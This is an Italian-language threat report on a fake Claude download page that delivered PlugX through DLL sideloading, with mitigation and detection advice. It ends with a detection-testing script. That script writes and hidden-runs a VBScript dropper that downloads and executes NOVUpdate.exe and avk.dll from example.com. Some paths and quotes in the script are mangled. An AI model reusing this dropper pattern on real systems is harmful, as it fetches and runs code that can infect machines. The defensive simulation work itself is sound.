Un sito fasullo di Claude installa malware che consente agli hacker di accedere al tuo computer

Sintesi

Gli aggressori hanno allestito una falsa pagina di download per Claude che distribuiva un archivio ZIP trojanizzato agli utenti ignari. Una volta aperto, l’archivio installava un client desktop Claude apparentemente legittimo mentre distribuisce segretamente il trojan PlugX mediante sideloading DLL con un aggiornamento firmato G DATA. Il payload malevolo veniva posizionato nella cartella di Avvio dell’utente per mantenere la persistenza e poi iniziava una comunicazione HTTPS verso un server di comando e controllo. La campagna dimostra come gli attori delle minacce sfruttano sempre più l’interesse per gli strumenti di intelligenza artificiale popolari come esca di ingegneria sociale per il compromesso iniziale.

Indagine

Durante l’analisi, i ricercatori hanno scompattato l’archivio ZIP, identificato il percorso di installazione dell’MSI e seguito l’esecuzione fino a un dropper VBScript che scriveva NOVUpdate.exe, un malevolo avk.dll, e un file di dati crittografato nella cartella di Avvio. L’esecuzione in sandbox ha confermato che il binario sideloaded veniva avviato con successo, modificava una chiave di registro correlata a TCP/IP e iniziava connessioni in uscita sulla porta 443 verso un indirizzo IP ospitato su Alibaba Cloud. Questi risultati hanno confermato la consegna di PlugX tramite una catena di infezione a stadi mascherata da software AI legittimo.

Mitigazione

Gli utenti dovrebbero scaricare il software Claude solo da fonti ufficiali verificate e convalidare l’autenticità dei pacchetti di installazione prima di eseguirli. I difensori dovrebbero ispezionare le cartelle di Avvio per binari o DLL inaspettati, specialmente i file che imitano componenti di aggiornamento legittimi. Anche il traffico HTTPS in uscita proveniente da applicazioni di nuova installazione dovrebbe essere rivisto tramite firewall e telemetria degli endpoint. Rimuovere i file dannosi, invertire eventuali modifiche non autorizzate al registro e eseguire una scansione anti-malware di fiducia sono passaggi chiave per contenere la minaccia.

Risposta

I team di sicurezza dovrebbero rilevare e allertare sulla presenza di NOVUpdate.exe, avk.dll, o NOVUpdate.exe.dat all’interno della directory di Avvio. Ulteriori rilevamenti dovrebbero concentrarsi sui binari firmati G DATA updater che caricano DLL non fidate e stabiliscono sessioni TLS in uscita inaspettate verso l’infrastruttura identificata. Gli host interessati dovrebbero essere sottoposti a piena remediation e revisione forense per confermare che nessun altro componente PlugX, meccanismo di persistenza o payload seguenti rimangano attivi.

Esecuzione della Simulazione

Prerequisito: Il controllo pre‑volo di Telemetria & Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevazione. I comandi e il narrativo DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevazione. Esempi astratti o non correlati porteranno a una diagnosi errata.

• Narrativa dell’Attacco & Comandi:
  Un attaccante crea un script VBS malevolo che scarica il payload NOVUpdate.exe da un server di comandi e controllo (C2), lo scrive in %TEMP%, e poi lo avvia tramite wscript.exe. Lo stesso script carica anche avk.dll dalla stessa posizione per ottenere il sideloading DLL. L’attaccante si affida all’Host Script Windows (WSH) integrato per evitare di suscitare sospetti dalle euristiche AV tradizionali.

  1. Scrivi il file VBS malevolo (malicious.vbs) in %TEMP%.
  2. Invoca wscript.exe con il percorso del file VBS.
  3. Lo script VBS esegue un HTTP GET per scaricare NOVUpdate.exe and avk.dll, li scrive su disco ed esegue NOVUpdate.exe.

• Script di Test di Regressione:

  # --------------------------------------------------------------------
  # Simulazione dropper malevolo – attiva la regola Sigma
  # --------------------------------------------------------------------
  $tempDir = "$env:TEMPDropperDemo"
  New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
  
  # 1. Crea VBS malevolo che scarica due file ed esegue NOVUpdate.exe
  $vbsPath = "$tempDirmalicious.vbs"
  $vbsContent = @"
  Set objXML = CreateObject("Microsoft.XMLHTTP")
  objXML.open "GET", "http://example.com/NOVUpdate.exe", False
  objXML.send
  If objXML.Status = 200 Then
  Set objStream = CreateObject("ADODB.Stream")
  objStream.Type = 1
  objStream.Open
  objStream.Write objXML.ResponseBody
  objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
  objStream.Close
  End If

‘ Scarica avk.dll (usato per il sideloading DLL) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If

‘ Esegui l’EXE rilasciato CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Esegui lo script via wscript.exe (questa è la telemetria che stiamo testando)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPZIONALE: pausa per consentire il rilevamento
Start-Sleep -Seconds 10
# --------------------------------------------------------------------

• Comandi di Pulizia:

  # Rimuovi tutti gli artefatti creati dalla simulazione
  $tempDir = "$env:TEMPDropperDemo"
  if (Test-Path $tempDir) {
      Remove-Item -Path $tempDir -Recurse -Force
  }
  
  # Assicurati che eventuali processi NOVUpdate.exe rimasti siano terminati
  Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force